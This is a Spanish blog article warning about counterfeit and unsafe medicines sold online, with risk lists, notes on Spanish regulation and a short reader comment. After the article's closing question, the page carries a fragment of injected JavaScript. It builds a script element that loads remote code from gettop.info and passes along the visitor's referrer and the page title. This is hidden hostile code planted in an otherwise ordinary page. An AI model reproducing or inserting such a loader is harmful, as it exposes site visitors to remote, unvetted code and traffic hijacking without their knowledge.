Salud y belleza » Medicina, Salud

El riesgo de comprar medicamentos por internet

1 Comentario

En internet se pueden encontrar medicamentos para la depresión, la impotencia, el SIDA, el Alzhéimer… casi cualquier tipo de medicamento y sin receta, pero no siempre recibes lo que compras ni cumple con las exigencias sanitarias mínimas. Las farmacias online han crecido significativamente en los últimos años y se puede encontrar casi de todo.

venta-medicamentos-online

Sin embargo, hay muchos riesgos. Según la Organización Mundial de la Salud, más del 50% de los medicamentos que se venden por internet son falsificaciones. En cifras exactas, hay un 90% de posibilidades de que el comprador sea engañado. Esto, además de provocar la pérdida del dinero y la estafa, supone una gran amenaza para la salud pública y va en aumento ya que el tráfico de estos productos es 25 veces más rentable que la venta de drogas. Además, la falsificación de medicamentos tiene un riesgo menor para el delincuente y también menor reproche social, por lo que ya se han organizado en bandas criminales y paraísos fiscales.

Pero las falsificaciones no solo no dan el efecto deseado, sino que además pueden ser muy perjudiciales para la salud ya que se han encontrado en algunos medicamentos falsos sustancias contaminantes como pesticidas, pintura y tinta de impresora. Pero es difícil determinar si un producto es falso o no porque las falsificaciones suelen copiar hasta el más mínimo detalle, menos los componentes, por lo que habría que hacer un análisis químico para determinar si es una copia o es real.

venta-medicinas-online

Riesgos de comprar medicamentos por internet:

- Falta de seguridad y garantía de la eficacia.

- Instrucciones para el uso pueden ser inapropiadas.

- Calidad no garantizada.

- Productos pueden ser fraudulentos y nocivos para la salud.

- Pueden estar prohibidos en algunos países.

- No tienen control médico ni sanitario.

farmacia-online

En España está prohibido vender medicamentos por internet, pero como la red es de acceso global una persona puede comprar perfectamente desde su ordenador de España a cualquier página web ubicada en un país donde sí sea legal. Pero las normas están cambiando y en poco tiempo España permitirá que las farmacias vendan a través de internet, pero solo las farmacias físicas con licencias en Farmacia y deberán llevar un logo identificativo que será común en todo el país y que se ajustará a la normativa europea.

¿Alguna vez has comprado medicamentos por internet? ¿Se ha visto en riesgo tu salud?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , , ,

One Comment »

  • susi said:

    yo no me fío, no quiero comprar medicamentos por internet. me parece super peligroso la verdad porque pones en riesgo directamente tu salud.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.